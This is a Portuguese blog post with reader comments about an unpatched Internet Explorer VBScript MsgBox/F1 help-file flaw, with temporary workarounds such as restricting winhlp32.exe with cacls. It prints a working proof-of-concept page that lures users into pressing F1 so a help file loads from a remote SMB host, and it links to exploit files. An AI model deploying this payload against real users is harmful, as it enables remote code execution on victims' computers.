Mais um bug do IElixo :P
A Microsoft recomenda aos usuários do Windows XP que não apertem a tecla F1 quando pedido por um site, como parte da reação a uma vulnerabilidade que ainda não foi corrigida que pode ser usada para invadir computadores usando o Internet Explorer (IE).
Em um boletim de segurança divulgado na segunda-feira (1/3), a empresa confirmou um erro no VBScript, oferecendo mais informações sobre a falha e dando dicas sobre como proteger o computador até o lançamento da correção.
Segue abaixo o exploit e a solução temporária para a falha.
Exploit:
Para exploração da falha e necessário utilização de engenharia social.
Proof-of-Concept em: http://isec.pl/poc-isec27/
A copy of test.hlp can be downloaded from here: http://www.exploit-db.com/sploits/msgbox_test_help.zip
———————————————<code>——————————————————-
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
———————————————EOF———————————————————-
Soluções alternativas
Enquanto a micro$oft não disponibiliza uma atualização de segurança para corrigir a falha, podem ser adotas algumas medidas de segurança para se proteger:Não pressione F1.
Para exploração bem sucedida desta vulnerabilidade requer que o sistema de ajuda do Windows esteja funcionando de forma irrestrita. Você pode ajudar a proteger contra a exploração desta vulnerabilidade ,modificando a ACL winhlp32.exe para que ela seja mais restritiva, executando o seguinte comando em uma linha de comando administrativo:
echo Y | cacls "%windir%\winhlp32.exe" /E /P everyone:N
Para desfazer a configuração:
echo Y | cacls "%windir%\winhlp32.exe" /E /R everyone
Ou pode bloquear a execução de comandos activeX e Active Scripting, elevando a segurança do navegador para Alta( menu ferramentas>opções de internet> aba segurança> mova o nível de médio para alta).
Lembrando com ambas as alternativas alguns sites podem apresentar problemas. A melhor forma de evitar a falha de segurança e migrando para um navegador melhor como o firefox, google chrome, opera ou safari.
Links:
Microsoft Security Advisory (981169)
Microsoft Internet Explorer ‘winhlp32.exe’ ‘MsgBox()’ Remote Code Execution Vulnerability
Microsoft Security Advisory (981169)
Vulnerability Note VU#612021
Investigating a new win32hlp and Internet Explorer issue
http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt
[]‘s
Loading ...
Von,
Muito bom avisar quanto à vulnerabilidade para quem usa o IE, principalmente. Lembrando que praticamente todos os browsers estão com vulnerabilidades não corrigidas, salvando-se o Ópera e o Safari.
Parabéns pelo texto e o conteúdo explicativo.
no entanto uma pessoa leiga na minha opinião não teria condições de corrigir este erro com este procedimento citado a cima, mas ja alerta do problemaão que o eventual aperto do F1 pode causar
como você disse no comentario do post
http://explicacaodanet.blogspot.com/2010/03/microsoft-anuncia-nao-aperte-tecla-f1.html
“A melhor recomendação é evitar o uso do IE, migrando para um navegador mais seguro como o firefox ou google chrome.”